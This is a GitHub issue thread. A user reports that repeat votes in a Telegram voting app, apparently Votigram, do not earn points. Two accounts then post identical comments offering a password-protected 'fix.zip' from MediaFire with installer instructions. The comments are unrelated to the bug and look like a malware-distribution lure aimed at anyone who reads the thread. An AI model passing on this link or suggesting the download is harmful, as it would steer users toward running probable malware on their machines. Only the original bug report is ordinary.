### ISSUE TITLE
Vote points disappear

### ISSUE THREAD

**Issue by devgantmrwdao** [TomorrowDAOProject/tomorrowDAO-indexer#67]
### Description
Can not get points when vote for same app on same telegram ranking list on different day.

### Steps To Reproduce
1. Log in through telegram bot: votigram.
2. Vote for same app on same telegram ranking list on different day.
3. check my points.

### Current Behavior
- can not get points for every vote.

### Expected Behavior
- Get points for every vote.

### Environment
- Platform: PC
- Node: v18.18.0
- Browser: Chrome 126.0.6478.56

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
